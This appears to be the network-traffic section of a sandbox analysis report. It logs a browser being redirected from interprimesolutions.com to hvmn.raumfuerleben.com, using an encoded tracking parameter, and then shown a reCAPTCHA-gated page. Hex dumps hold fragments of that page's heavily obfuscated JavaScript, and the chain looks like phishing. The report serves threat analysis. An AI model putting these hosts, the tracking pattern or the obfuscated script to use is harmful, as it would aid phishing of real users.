Source: global traffic	HTTP traffic detected: GET /imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ= HTTP/1.1Host: interprimesolutions.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?W5Eh5Z=Wpud2RjQGFsLmNvbQ== HTTP/1.1Host: hvmn.raumfuerleben.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hvmn.raumfuerleben.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://hvmn.raumfuerleben.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/bg/PSKopaksc4v0TeE9MSufUBd6uLsTLN3_1JKIESb4JYg.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh&co=aHR0cHM6Ly9odm1uLnJhdW1mdWVybGViZW4uY29tOjQ0Mw..&hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&size=normal&cb=7ipr88utdgc0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WLmPEdGXKfswU18&MD=Elb1RbNs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/bg/PSKopaksc4v0TeE9MSufUBd6uLsTLN3_1JKIESb4JYg.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://hvmn.raumfuerleben.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA5fq74Km0ZGDuqNCU_pmYFf37TI-6A0_gAenwYHSbFYwCm6V_3S4vCnGn2b1XN7f20v0UeQgXaxsudYAYuVCO_prq-RRxqi4NetwtBUtCW86jSDVGhYj6e1ubgq0DosPP4k4pDhtK5hIAWIscploEbEiIvYplfKdG0wUzcDjW-sCksCBMzNNR2gRlb6bI3VFVuFCX20&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHhAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AM2HMKjSGX0bVN3CtRJHxJ8hI3XQBRlbnpoHDhDzoTqAHjQSwfZJvBS127XkYbnATdMcEtM869HBhnSibNTFB7c
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/reload?k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AM2HMKjSGX0bVN3CtRJHxJ8hI3XQBRlbnpoHDhDzoTqAHjQSwfZJvBS127XkYbnATdMcEtM869HBhnSibNTFB7c
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA5fq74Km0ZGDuqNCU_pmYFf37TI-6A0_gAenwYHSbFYwCm6V_3S4vCnGn2b1XN7f20v0UeQgXaxsudYAYuVCO_prq-RRxqi4NetwtBUtCW86jSDVGhYj6e1ubgq0DosPP4k4pDhtK5hIAWIscploEbEiIvYplfKdG0wUzcDjW-sCksCBMzNNR2gRlb6bI3VFVuFCX20&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AM2HMKjSGX0bVN3CtRJHxJ8hI3XQBRlbnpoHDhDzoTqAHjQSwfZJvBS127XkYbnATdMcEtM869HBhnSibNTFB7c
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WLmPEdGXKfswU18&MD=Elb1RbNs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: interprimesolutions.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: hvmn.raumfuerleben.com

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 13:31:39.625197887 CEST	53	64559	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:39.761512041 CEST	53	64123	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:40.839313030 CEST	58983	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:40.839541912 CEST	50198	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:40.906774044 CEST	53	56516	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:41.054071903 CEST	53	58983	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:41.072405100 CEST	53	50198	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:44.162925959 CEST	49956	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:44.163140059 CEST	49192	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:44.170069933 CEST	53	49956	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:44.170218945 CEST	53	49192	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:45.654920101 CEST	56371	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:45.655088902 CEST	62580	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:45.688738108 CEST	53	56371	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:45.689158916 CEST	53	62580	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:47.383989096 CEST	57603	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:47.384326935 CEST	62870	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:47.390783072 CEST	53	57603	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:47.391192913 CEST	53	62870	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:48.329575062 CEST	65034	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:48.329796076 CEST	59111	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:48.335001945 CEST	53	64422	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:48.335962057 CEST	53	65034	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:48.336381912 CEST	53	59111	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:49.921099901 CEST	53	51337	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:49.965941906 CEST	57128	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:49.966177940 CEST	59209	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:31:49.973856926 CEST	53	57128	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:49.974339962 CEST	53	59209	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:50.063973904 CEST	53	51915	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:51.002729893 CEST	53	56287	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:53.487523079 CEST	53	51125	1.1.1.1	192.168.2.4
Aug 28, 2024 13:31:56.794269085 CEST	138	138	192.168.2.4	192.168.2.255
Aug 28, 2024 13:31:58.167646885 CEST	53	58097	1.1.1.1	192.168.2.4
Aug 28, 2024 13:32:17.631305933 CEST	53	58369	1.1.1.1	192.168.2.4
Aug 28, 2024 13:32:39.333826065 CEST	53	57104	1.1.1.1	192.168.2.4
Aug 28, 2024 13:32:41.028768063 CEST	53	57582	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:42 UTC	716	OUT	GET /imp/ns/?hg=vndankxgbdow&vn=ujdgsmfdd2RjQGFsLmNvbQ= HTTP/1.1 Host: interprimesolutions.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:45 UTC	261	IN	HTTP/1.1 302 Moved Temporarily Date: Wed, 28 Aug 2024 11:31:42 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Location: https://hvmn.raumfuerleben.com/?W5Eh5Z=Wpud2RjQGFsLmNvbQ== Content-Length: 0 Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:45 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-28 11:31:45 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=252252 Date: Wed, 28 Aug 2024 11:31:45 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:46 UTC	692	OUT	GET /?W5Eh5Z=Wpud2RjQGFsLmNvbQ== HTTP/1.1 Host: hvmn.raumfuerleben.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:47 UTC	181	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Aug 2024 11:31:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2024-08-28 11:31:47 UTC	16203	IN	Data Raw: 37 37 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 57 2c 4e 29 7b 76 61 72 20 5a 4c 3d 61 30 57 35 2c 61 3d 57 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5a 3d 2d 70 61 72 73 65 49 6e 74 28 5a 4c 28 30 78 32 62 61 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5a 4c 28 30 78 31 38 64 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5a 4c 28 30 78 31 30 34 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5a 4c 28 30 78 32 32 63 29 29 2f 30 78 34 29 2b 70 61 72 73 65 49 6e 74 28 5a 4c 28 30 78 Data Ascii: 77f6<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> (function(W,N){var ZL=a0W5,a=W();while(!![]){try{var Z=-parseInt(ZL(0x2ba))/0x1(parseInt(ZL(0x18d))/0x2)+-parseInt(ZL(0x104))/0x3(parseInt(ZL(0x22c))/0x4)+parseInt(ZL(0x
2024-08-28 11:31:47 UTC	14515	IN	Data Raw: 65 74 75 72 6e 20 50 47 28 30 78 32 31 64 29 3d 3d 3d 61 79 26 26 28 28 61 4c 3d 7b 7d 29 5b 50 47 28 30 78 32 31 66 29 5d 3d 7b 7d 2c 61 4c 5b 27 63 6f 6e 73 74 72 75 63 74 6f 72 27 5d 5b 61 44 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 4c 3b 7d 2c 61 4c 5b 50 47 28 30 78 34 62 65 29 5d 3d 27 27 2c 61 4c 5b 61 49 5d 3d 2f 2e 2f 5b 61 49 5d 29 2c 61 4c 5b 50 47 28 30 78 31 35 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 50 58 3d 50 47 3b 72 65 74 75 72 6e 20 50 58 28 30 78 32 64 32 29 3d 3d 3d 27 63 53 52 6f 4a 27 3f 7b 27 65 72 72 6f 72 27 3a 21 30 78 30 2c 27 76 61 6c 75 65 27 3a 57 78 7d 3a 28 61 48 3d 21 30 78 30 2c 6e 75 6c 6c 29 3b 7d 2c 61 4c 5b 61 49 5d 28 27 27 29 2c 21 61 48 3b 7d 65 6c 73 65 7b 76 61 72 20 61 78 Data Ascii: eturn PG(0x21d)===ay&&((aL={})[PG(0x21f)]={},aL['constructor'][aD]=function(){return aL;},aL[PG(0x4be)]='',aL[aI]=/./[aI]),aL[PG(0x158)]=function(){var PX=PG;return PX(0x2d2)==='cSRoJ'?{'error':!0x0,'value':Wx}:(aH=!0x0,null);},aL[aI](''),!aH;}else{var ax
2024-08-28 11:31:47 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 51 3d 70 50 28 30 78 32 30 39 29 2c 61 53 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 46 3d 70 50 3b 69 66 28 70 46 28 30 78 32 36 38 29 21 3d 3d 70 46 28 30 78 32 36 38 29 29 7b 69 66 28 57 53 3e 30 78 31 66 66 66 66 66 66 66 66 66 66 66 66 66 29 74 68 72 6f 77 20 57 6e 28 70 46 28 30 78 34 34 37 29 29 3b 72 65 74 75 72 6e 20 57 42 3b 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 3b 61 43 5b 70 50 28 30 78 33 66 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 61 68 2c 61 52 2c 61 6f 2c 61 6b 2c 61 64 2c 61 55 2c 61 56 29 7b 76 61 72 20 70 70 3d 70 50 3b 69 66 28 70 70 28 30 78 33 35 37 29 21 3d 3d 70 70 28 30 78 33 35 37 29 29 7b 76 61 72 20 5a 32 3d 61 64 28 30 78 37 30 66 29 2c 5a 33 3d 61 51 28 30 78 31 36 37 62 29 2c 5a 34 Data Ascii: 4000Q=pP(0x209),aS=function(){var pF=pP;if(pF(0x268)!==pF(0x268)){if(WS>0x1fffffffffffff)throw Wn(pF(0x447));return WB;}else return this;};aC[pP(0x3f7)]=function(ah,aR,ao,ak,ad,aU,aV){var pp=pP;if(pp(0x357)!==pp(0x357)){var Z2=ad(0x70f),Z3=aQ(0x167b),Z4
2024-08-28 11:31:47 UTC	8	IN	Data Raw: 27 67 27 29 2c 61 0d 0a Data Ascii: 'g'),a
2024-08-28 11:31:47 UTC	16384	IN	Data Raw: 38 36 33 62 0d 0a 69 5b 27 69 67 6e 6f 72 65 43 61 73 65 27 5d 26 26 28 61 76 2b 3d 27 69 27 29 2c 61 69 5b 27 6d 75 6c 74 69 6c 69 6e 65 27 5d 26 26 28 61 76 2b 3d 27 6d 27 29 2c 61 69 5b 27 64 6f 74 41 6c 6c 27 5d 26 26 28 61 76 2b 3d 27 73 27 29 2c 61 69 5b 4f 6c 28 30 78 32 31 33 29 5d 26 26 28 61 76 2b 3d 27 75 27 29 2c 61 69 5b 4f 6c 28 30 78 33 30 61 29 5d 26 26 28 61 76 2b 3d 27 76 27 29 2c 61 69 5b 4f 6c 28 30 78 31 30 35 29 5d 26 26 28 61 76 2b 3d 27 79 27 29 2c 61 76 3b 7d 3b 7d 2c 30 78 32 36 30 38 3a 66 75 6e 63 74 69 6f 6e 28 61 43 2c 61 4b 2c 61 75 29 7b 76 61 72 20 4f 69 3d 61 30 57 35 2c 61 6c 3d 61 75 28 30 78 37 30 66 29 2c 61 69 3d 61 75 28 30 78 31 36 37 62 29 2c 61 76 3d 61 75 28 30 78 31 32 63 66 29 2c 61 72 3d 61 75 28 30 78 31 39 Data Ascii: 863bi['ignoreCase']&&(av+='i'),ai['multiline']&&(av+='m'),ai['dotAll']&&(av+='s'),ai[Ol(0x213)]&&(av+='u'),ai[Ol(0x30a)]&&(av+='v'),ai[Ol(0x105)]&&(av+='y'),av;};},0x2608:function(aC,aK,au){var Oi=a0W5,al=au(0x70f),ai=au(0x167b),av=au(0x12cf),ar=au(0x19
2024-08-28 11:31:47 UTC	16384	IN	Data Raw: 30 78 31 38 32 38 3a 66 75 6e 63 74 69 6f 6e 28 61 43 2c 61 4b 2c 61 75 29 7b 76 61 72 20 43 53 3d 61 30 57 35 2c 61 6c 3d 61 75 28 30 78 32 31 61 34 29 2c 61 69 3d 61 75 28 30 78 35 38 31 29 2c 61 76 3d 61 75 28 30 78 62 66 62 29 2c 61 72 3d 61 75 28 30 78 37 30 66 29 2c 61 6a 3d 61 75 28 30 78 31 32 39 61 29 2c 61 54 3d 61 75 28 30 78 32 31 31 39 29 2c 61 44 3d 61 75 28 30 78 35 63 62 29 2c 61 4d 3d 61 75 28 30 78 35 38 66 29 2c 61 79 3d 61 75 28 30 78 36 61 32 29 2c 61 45 3d 61 75 28 30 78 31 34 35 66 29 2c 61 71 3d 61 75 28 30 78 31 37 38 64 29 2c 61 4a 3d 53 74 72 69 6e 67 2c 61 49 3d 61 69 28 43 53 28 30 78 32 39 32 29 2c 43 53 28 30 78 34 38 32 29 29 2c 61 7a 3d 61 6a 28 2f 2e 2f 5b 43 53 28 30 78 31 35 38 29 5d 29 2c 61 62 3d 61 6a 28 27 27 5b 27 Data Ascii: 0x1828:function(aC,aK,au){var CS=a0W5,al=au(0x21a4),ai=au(0x581),av=au(0xbfb),ar=au(0x70f),aj=au(0x129a),aT=au(0x2119),aD=au(0x5cb),aM=au(0x58f),ay=au(0x6a2),aE=au(0x145f),aq=au(0x178d),aJ=String,aI=ai(CS(0x292),CS(0x482)),az=aj(/./[CS(0x158)]),ab=aj(''['
